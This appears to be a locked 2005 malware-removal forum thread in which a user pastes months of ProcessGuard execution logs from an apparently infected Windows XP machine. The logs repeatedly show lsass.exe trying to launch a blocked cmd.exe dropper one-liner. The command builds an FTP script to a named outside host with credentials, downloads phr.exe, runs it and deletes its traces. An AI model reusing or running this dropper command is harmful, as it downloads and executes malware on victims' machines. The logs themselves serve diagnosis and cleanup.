This topic is locked
thanks for your help Pieter
C:\Program Files\ProcessGuard\logs\pglog_08_2005.txt (1261 KB, 31/08/2005 20:52:00)
0 documents\hijack\hijackthis.exe" ]Fri 05 - 20:28:58 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9cf033fa2e804341b6db742562332e61 ]Fri 05 - 20:28:58 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf2f34e9f16e20a4b84534255659f0578 ]Fri 05 - 20:28:59 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0ea527d9f30d9441ba97f2e0b018f015 ]Fri 05 - 20:28:59 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds93f7048157a5f84ca79ddbae3fd60f26 ]Fri 05 - 20:29:54 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Fri 05 - 20:32:11 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]Fri 05 - 20:32:27 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run [EXECUTION] Started by "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" [2756] [EXECUTION] Commandline - [ "c:\windows\system32\notepad.exe" c:\documents and settings\dug and tania\my documents\hijack\startuplist.txt ]Fri 05 - 20:43:18 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [492] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Fri 05 - 20:46:44 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [144] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]Fri 05 - 20:49:34 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avginet.exe" [2604] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgw.exe" /update "c:\documents and settings\all users\application data\grisoft\avg7data\avg7upd\install\u-fwd.idx" ]Fri 05 - 20:54:08 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1012] [EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]Fri 05 - 20:54:14 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [652] [EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]Fri 05 - 20:58:59 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds16a66bd90362934da2998802b1d3fcdc ]Fri 05 - 20:58:59 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds82044426db60b34581f4fde41a59e286 ]Fri 05 - 21:03:51 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]---Process Guard Log Started---Sun 07 - 08:52:50 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EX
0 cal\[2d4]susds532e978258efb747a8a387736af622a5 ]Sun 07 - 08:59:13 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsa14787dd14e85d4a87559b5b94fac1c1 ]Sun 07 - 08:59:23 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1236] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Sun 07 - 09:00:49 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [532] [EXECUTION] Commandline - [ cmd ]Sun 07 - 09:01:58 [EXECUTION] "c:\windows\regedit.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1236] [EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e c:\userinit.reg "hklm\software\microsoft\windows nt\currentversion\winlogon" > ok ]Sun 07 - 09:03:22 [EXECUTION] "c:\windows\regedit.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1236] [EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e c:\userinit.reg "hklm\software\microsoft\windows nt\currentversion\winlogon" ]Sun 07 - 09:04:08 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1236] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Sun 07 - 09:06:32 [EXECUTION] "c:\windows\regedit.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1236] [EXECUTION] Commandline - [ "c:\windows\regedit.exe" /e c:\userinit.reg "hklm\software\microsoft\windows nt\currentversion\winlogon" > ]Sun 07 - 09:12:59 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1320] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" /sched=5 ]Sun 07 - 09:25:41 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [532] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Sun 07 - 09:29:13 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susds0edb2f68b482534888ae939ef2f4ec2f ]Sun 07 - 09:29:13 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsa0fd7a4e082d5a4b93d3e1c3705606d8 ]Sun 07 - 09:43:35 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [476] [EXECUTION] Commandline - [ logonui.exe /status /shutdown ]Sun 07 - 09:43:46 [TERMINATE] c:\windows\system32\services.exe [520] was blocked from terminating c:\windows\system32\spoolsv.exe [972]---Process Guard Log Started---Sun 07 - 18:44:47 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [520] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Sun 07 - 18:44:47 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [520] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Sun 07 - 18:44:48 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1500] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Sun 07 - 18:44:50 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1232] [EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]Sun 07 - 18:44:51 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1232]
C:\Program Files\ProcessGuard\logs\pglog_09_2005.txt (1235 KB, 30/09/2005 21:24:38)
0 nning [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds741fc4de26fe7846a71325c3cf4490f3 ]Fri 02 - 18:32:27 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsf49c9513fb8c714c97f061c313d4cbbe ]Fri 02 - 18:32:38 [EXECUTION] "c:\program files\grisoft\avg free\avgwb.dat" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1912] [EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgwb.dat" /switchui ]Fri 02 - 19:16:38 [EXECUTION] "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\pchealth\helpctr\binaries\helpsvc.exe" /embedding ]Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdse322dd4ea69d034095a8ce31cbd8c16a ]Fri 02 - 19:16:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsd87d725ed55ddf43b2d2a850a348b7e9 ]Fri 02 - 19:17:15 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Fri 02 - 19:19:05 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 02 - 19:20:26 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Fri 02 - 19:46:35 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" /d shell32.dll,control_rundll desk.cpl ]Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds63b9778dae548549a82735d30a6f329b ]Fri 02 - 19:46:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsce7988fd05875749b273a58ea28e7fe5 ]Fri 02 - 19:48:56 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1000] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Fri 02 - 20:16:38 [EXECUTION] "c:\win
0 was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Sun 04 - 10:26:56 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 04 - 10:27:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4a18b0adfc8e4548aa19a1f203163a9e ]Sun 04 - 10:27:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds008d02a042612745bb190c0cc19e2e3c ]Sun 04 - 10:27:38 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds08b197db6599b148b4e5ca7353032eb3 ]Sun 04 - 10:27:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4173be42a2d6224baae1bb4caa7b2663 ]Sun 04 - 10:28:18 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_09_2005.txt ]Sun 04 - 10:28:45 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1008] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Sun 04 - 10:30:54 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Sun 04 - 10:57:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds50e8672d206bf04db2029156fba5fb8f ]Sun 04 - 10:57:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb0814a935d502144943928e5615927a6 ]Sun 04 - 11:27:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa8d154f7786f8549891f3a1af235407c ]Sun 04 - 11:27:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\
0 [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wer4.tmp.dir00\manifest.txt ]Sun 04 - 12:43:09 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432] [EXECUTION] Commandline - [ c:\windows\explorer.exe ]Sun 04 - 12:43:12 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]Sun 04 - 12:43:43 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 04 - 12:44:01 [EXECUTION] "c:\windows\explorer.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [956] [EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]Sun 04 - 12:44:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]Sun 04 - 12:45:30 [EXECUTION] "c:\windows\system32\dwwin.exe" was allowed to run [EXECUTION] Started by "g:\autorun.exe" [928] [EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -x -s 172 ]Sun 04 - 12:45:40 [EXECUTION] "c:\windows\system32\drwtsn32.exe" was allowed to run [EXECUTION] Started by "g:\autorun.exe" [928] [EXECUTION] Commandline - [ drwtsn32 -p 928 -e 136 -g ]Sun 04 - 12:47:01 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [956] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Sun 04 - 12:52:33 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd ]Sun 04 - 12:58:59 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Sun 04 - 13:11:10 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds6d99dfdbefa85a40a7b5893fd81df097 ]Sun 04 - 13:11:10 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds514fc08f6c9a8c468ab6ae53dc80ed27 ]Sun 04 - 13:31:29 [EXECUTION] "c:\program files\microsoft office\office\winword.exe" was allowed to run [EXECUTION] Started by "c:\program files\mozilla firefox\firefox.exe" [548] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\winword.exe" /n ]Sun 04 - 13:41:10 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds27f6579f7c30e94887c99d01f44ad0b9 ]Sun 04 - 13:41:10 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsc362daa2fc9dd5429f1a8136cb38b3ae ]Sun 04 - 13:44:38 [EXECUTION] "c:\program files\outlook express\msimn.exe" was blocked from running [EXECUTION] Started by "c:\program files\mozilla firefox\firefox.exe" [548] [EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" /mailurl:mailto:[email protected] ]Sun 04 - 14:11:10 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb981212527e48c47b9ac8e43c22955d5 ]Sun 04 - 14:11:10 [EXECUTION] "c:\windows\sys
0 from running [EXECUTION] Started by "c:\program files\common files\real\update_ob\realsched.exe" [1888] [EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realevent.exe" "c:\program files\common files\real\update_ob\rnms3270.dll" rnmsgdialupobserver ]Thu 15 - 20:29:04 [EXECUTION] "c:\program files\common files\real\update_ob\realevent.exe" was blocked from running [EXECUTION] Started by "c:\program files\common files\real\update_ob\realsched.exe" [1888] [EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realevent.exe" "c:\program files\common files\real\update_ob\upgr3270.dll" upgradedialupobserver ]Thu 15 - 20:29:07 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1004] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Thu 15 - 20:29:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds1af2b14526fdc844bb49b1aaaa2d713b ]Thu 15 - 20:29:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds0ae466a85ca3e94690107f38ae816c7d ]Thu 15 - 20:29:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9ed99fc05c1cdb4eb80d840a379f9489 ]Thu 15 - 20:29:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds4288c509dfe4e14484bd16894147d100 ]Thu 15 - 20:30:16 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [488] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Thu 15 - 20:59:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds21ad21b50cccd24dbdfe2c92034f1aed ]Thu 15 - 20:59:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds774eb8832fb3064ba6b7c3a20b8dfb22 ]Thu 15 - 21:29:09 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds281d2821ff3d484c887ebedc3c7da0ba ]Thu 15 - 21:29:10 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [676] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds187ef0345e7cdc4abe6d0378edabd543 ]---Process Guard Log Started---Fri 16 - 20:58:05 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]Fri 16 - 20:58:05 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1304] [EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]Fri 16 - 20:58:06 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [476] [EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]Fri 16 - 20:58:06 [EXECUTION] "c:\program files\grisoft\avg free\avgw.exe" was allowed to run [EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgamsvr.exe" [1180] [EXECUTION] Commandl
0 guard.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1232] [EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]Sun 18 - 13:47:03 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1232] [EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]Sun 18 - 13:47:04 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run [EXECUTION] Started by "c:\windows\system32\services.exe" [520] [EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]Sun 18 - 13:47:36 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run [EXECUTION] Started by "c:\windows\explorer.exe" [1232] [EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]Sun 18 - 13:47:44 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsf8c66ceec65c944a8c6f1da19074dd47 ]Sun 18 - 13:47:44 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susds444746020e4df545aacdb098a3f4ecea ]Sun 18 - 13:47:44 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdse75b804ddcf2d84e92614a7c439ae518 ]Sun 18 - 13:47:44 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\svchost.exe" [724] [EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susds5ff47cf92009064da88e87430b957f49 ]Sun 18 - 14:01:16 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running [EXECUTION] Started by "c:\windows\system32\lsass.exe" [532] [EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]Sun 18 - 14:05:
C:\Program Files\ProcessGuard\logs\pglog_10_2005.txt (1564 KB, 31/10/2005 22:00:54)
